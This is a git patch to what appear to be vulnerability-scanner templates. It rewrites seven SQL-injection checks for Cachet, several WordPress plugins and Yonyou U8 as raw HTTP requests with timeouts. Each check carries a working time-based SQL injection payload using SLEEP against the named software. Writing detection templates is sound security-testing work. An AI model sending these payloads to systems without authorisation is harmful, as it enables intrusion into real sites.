From a4c09b87195d3686d34ce3d69e35b9ca6ac9cb37 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 22 Jun 2024 22:19:54 -0700
Subject: [PATCH] updated template format for sqli templates with timeout

---
 http/cves/2021/CVE-2021-39165.yaml            |  8 ++++---
 http/cves/2023/CVE-2023-6360.yaml             | 16 ++++++++-----
 http/cves/2023/CVE-2023-6567.yaml             |  8 ++++---
 http/cves/2024/CVE-2024-1061.yaml             |  8 ++++---
 .../wp-autosuggest-sql-injection.yaml         |  8 ++++---
 .../wordpress/wp-statistics-sqli.yaml         | 23 +++++++++++++++----
 .../yonyou/yonyou-u8-sqli.yaml                | 16 ++++++++++---
 7 files changed, 61 insertions(+), 26 deletions(-)

diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml
index b8172d9f51..280d635a49 100644
--- a/http/cves/2021/CVE-2021-39165.yaml
+++ b/http/cves/2021/CVE-2021-39165.yaml
@@ -34,9 +34,11 @@ info:
   tags: cve,cve2021,cachet,sqli,chachethq
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1
+        Host: {{Hostname}}
 
     redirects: true
     max-redirects: 2
diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml
index 49a9b9aa46..06a839dd4f 100644
--- a/http/cves/2023/CVE-2023-6360.yaml
+++ b/http/cves/2023/CVE-2023-6360.yaml
@@ -31,12 +31,14 @@ info:
     framework: wordpress
     fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"'
   tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson
+
 flow: http(1) && http(2)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"
+  - raw:
+      - |
+        GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: word
@@ -44,9 +46,11 @@ http:
         words:
           - 'My Calendar'
 
-  - method: GET
-    path:
-      - "{{BaseURL}}/?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml
index b4b169302e..280685922d 100644
--- a/http/cves/2023/CVE-2023-6567.yaml
+++ b/http/cves/2023/CVE-2023-6567.yaml
@@ -33,9 +33,11 @@ info:
   tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml
index 370ab6089f..51f07678f6 100644
--- a/http/cves/2024/CVE-2024-1061.yaml
+++ b/http/cves/2024/CVE-2024-1061.yaml
@@ -34,9 +34,11 @@ info:
   tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
diff --git a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
index 9c44aa3e9e..27ba0d61b1 100644
--- a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
+++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
@@ -15,9 +15,11 @@ info:
   tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
index f30d06d3fb..43b4b4394f 100644
--- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
+++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
@@ -17,17 +17,30 @@ info:
     publicwww-query: /wp-content/plugins/wp-statistics/
   tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp
 
+flow: http(1) && http(2)
+
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)"
-      - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt"
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - 'WP Statistics'
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a) HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
           - 'duration>=6'
-          - 'contains(content_type, "text/html") && contains(body_2, "WP Statistics")'
           - 'status_code == 500'
         condition: and
 
diff --git a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
index b4c69fd1f6..8502df050f 100644
--- a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
@@ -15,13 +15,24 @@ info:
     fofa-query: icon_hash="-299520369"
   tags: yonyou,grp,sqli
 
+flow: http(1) && http(2)
+
+
 http:
   - raw:
       - |
         GET /login.jsp HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+
+    matchers:
+      - type: word
+        words:
+          - 'GRP-U8'
+        internal: true
+
+  - raw:
       - |
+        @timeout: 20s
         POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
@@ -32,8 +43,7 @@ http:
       - type: dsl
         dsl:
           - 'duration_2>=6'
-          - 'status_code == 200'
-          - 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")'
+          - 'contains(content_type, "text/html")'
         condition: and
 
 # digest: 4a0a00473045022100ff26707ab7b707eb63657075468f8fb5c9be2587a852c61a038cd6e74f11d80902201a654b27bab1bfb591f1d1cfd0517a439d2b61b67636eff6fac15f5091503614:922c64590222798bb761d5b6d8e72950